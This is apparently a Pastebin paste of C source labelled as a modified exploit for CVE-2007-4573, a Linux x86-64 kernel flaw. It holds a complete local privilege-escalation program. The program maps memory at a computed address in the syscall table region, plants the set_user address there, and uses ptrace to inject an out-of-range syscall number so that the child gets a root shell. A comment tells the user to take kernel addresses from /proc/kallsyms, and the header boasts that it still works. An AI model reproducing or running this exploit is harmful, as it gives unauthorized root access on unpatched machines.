Advertisement
Guest User

Untitled

a guest
Jun 19th, 2017
74
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // CVE-2007-4573 mod -yes,this CAN exploit 2010!
  2. #include <sys/ptrace.h>
  3. #include <sys/user.h>
  4. #include <sys/types.h>
  5. #include <sys/wait.h>
  6. #include <unistd.h>
  7. #include <stdio.h>
  8. #include <sys/mman.h>
  9. #include <string.h>
  10. #include <stdlib.h>
  11. #include <stddef.h>
  12. /*
  13.  * Replace these with the values of `ia32_sys_call_table' and
  14.  * `set_user' from /proc/kallsyms or /boot/System.map-$(uname -r)
  15.  */
  16. #define syscall_table 0xffffffff8044b8a0
  17. #define set_user      0xffffffff8028d785
  18. #define offset        (1L << 32)
  19. #define landing       (syscall_table + 8*offset)
  20.  
  21. int main() {
  22.        if((signed long)mmap((void*)(landing&~0xFFF), 4096,
  23.                              PROT_READ|PROT_EXEC|PROT_WRITE,
  24.                              MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
  25.                                0, 0) < 0) { // can make this 'not necessary' - use the other 2010 and some 2009 to work THAT out ;)
  26.                perror("mmap");
  27.                exit(-1);
  28.        }
  29.        *(long*)landing = set_user;
  30.        pid_t child;
  31.        child = fork();
  32.        if(child == 0) {
  33.                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
  34.                kill(getpid(), SIGSTOP);
  35.                __asm__("movl $0, %ebx\n\t"
  36.                        "int $0x80\n");
  37.                execl("/bin/sh", "/bin/sh", NULL);
  38.        } else {
  39.                wait(NULL);
  40.                ptrace(PTRACE_SYSCALL, child, NULL, NULL);
  41.                wait(NULL);
  42.                ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
  43.                        (void*)offset);
  44.                ptrace(PTRACE_DETACH, child, NULL, NULL);
  45.                wait(NULL);
  46.                /*
  47.                   use `PTRACE_POKEUSER` to poke `offset` into `%rax`,
  48.                   and then detach and let it run.
  49.                  */
  50.        }
  51. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement